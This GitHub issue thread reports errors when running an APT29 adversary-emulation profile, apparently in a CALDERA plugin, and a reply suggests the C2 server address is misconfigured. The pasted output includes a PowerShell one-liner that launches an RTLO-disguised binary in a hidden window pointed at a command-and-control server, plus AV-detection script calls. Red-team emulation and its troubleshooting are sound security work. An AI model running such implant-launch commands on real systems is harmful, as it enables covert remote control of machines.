Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Error in APT29 profile execution #91

Open
psrivast31 opened this issue Jun 21, 2021 · 1 comment
Open

Error in APT29 profile execution #91

psrivast31 opened this issue Jun 21, 2021 · 1 comment

Comments

@psrivast31
Copy link

psrivast31 commented Jun 21, 2021

Multiple payloads are not available while execution:


. .\stepTwelve.ps1;detectav
. : The term '.\stepTwelve.ps1' is not recognized as the name of a cmdlet, function, script file, or operable program.
Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:3


. .\stepThirteen.ps1;comp;
. : The term '.\stepThirteen.ps1' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.


Sleep 3;$bin = Get-ChildItem codscr*;$arguments = '-server "https://vm01-" -group "rtlo_group"';start-process -WindowStyle Hidden $bin.FullName.toString() -ArgumentList $arguments;if ($?) { write-host "Successfully completed RTLO execution. A new agent should appear"; exit 0;} else { write-host "Failure of RTLO execution."; exit 1;}
You cannot call a method on a null-valued expression.
At line:1 char:151


@Thamane
Copy link

Thamane commented Jun 29, 2021

Hello,
Are you sure you are running the latest version for emu ? It used to have a payload issue that got partially solved last month. Moreover the facts that you are using might be wrong. Your payload point to -server "https://vm01-" as a C2 server ( the server running caldera). It usually looks more like -server "192.168.0.4" depending on the ip where your c2 is located

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants